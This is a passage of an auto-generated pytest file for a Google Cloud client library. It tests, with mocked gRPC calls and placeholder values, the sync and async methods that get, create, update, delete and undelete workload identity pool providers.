assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE
assert response.disabled is True
assert response.attribute_condition == 'attribute_condition_value'
def test_get_workload_identity_pool_provider_from_dict():
test_get_workload_identity_pool_provider(request_type=dict)
def test_get_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
client.get_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.GetWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPoolProvider(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE,
disabled=True,
attribute_condition='attribute_condition_value',
))
response = await client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPoolProvider)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE
assert response.disabled is True
assert response.attribute_condition == 'attribute_condition_value'
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_async_from_dict():
await test_get_workload_identity_pool_provider_async(request_type=dict)
def test_get_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider()
client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPoolProvider())
await client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_workload_identity_pool_provider(
workload_identity_pool.GetWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPoolProvider())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_workload_identity_pool_provider(
workload_identity_pool.GetWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
def test_create_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_workload_identity_pool_provider_from_dict():
test_create_workload_identity_pool_provider(request_type=dict)
def test_create_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
client.create_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_async_from_dict():
await test_create_workload_identity_pool_provider_async(request_type=dict)
def test_create_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_workload_identity_pool_provider(
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].workload_identity_pool_provider_id == 'workload_identity_pool_provider_id_value'
def test_create_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_workload_identity_pool_provider(
workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest(),
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_workload_identity_pool_provider(
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].workload_identity_pool_provider_id == 'workload_identity_pool_provider_id_value'
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_workload_identity_pool_provider(
workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest(),
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
def test_update_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_update_workload_identity_pool_provider_from_dict():
test_update_workload_identity_pool_provider(request_type=dict)
def test_update_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
client.update_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_async_from_dict():
await test_update_workload_identity_pool_provider_async(request_type=dict)
def test_update_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
request.workload_identity_pool_provider.name = 'workload_identity_pool_provider.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool_provider.name=workload_identity_pool_provider.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
request.workload_identity_pool_provider.name = 'workload_identity_pool_provider.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool_provider.name=workload_identity_pool_provider.name/value',
) in kw['metadata']
def test_update_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_workload_identity_pool_provider(
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_workload_identity_pool_provider(
workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest(),
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_workload_identity_pool_provider(
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_workload_identity_pool_provider(
workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest(),
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
def test_delete_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_workload_identity_pool_provider_from_dict():
test_delete_workload_identity_pool_provider(request_type=dict)
def test_delete_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
client.delete_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_async_from_dict():
await test_delete_workload_identity_pool_provider_async(request_type=dict)
def test_delete_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_workload_identity_pool_provider(
workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_workload_identity_pool_provider(
workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
def test_undelete_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_undelete_workload_identity_pool_provider_from_dict():
test_undelete_workload_identity_pool_provider(request_type=dict)
def test_undelete_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
client.undelete_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_async_from_dict():
await test_undelete_workload_identity_pool_provider_async(request_type=dict)
def test_undelete_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
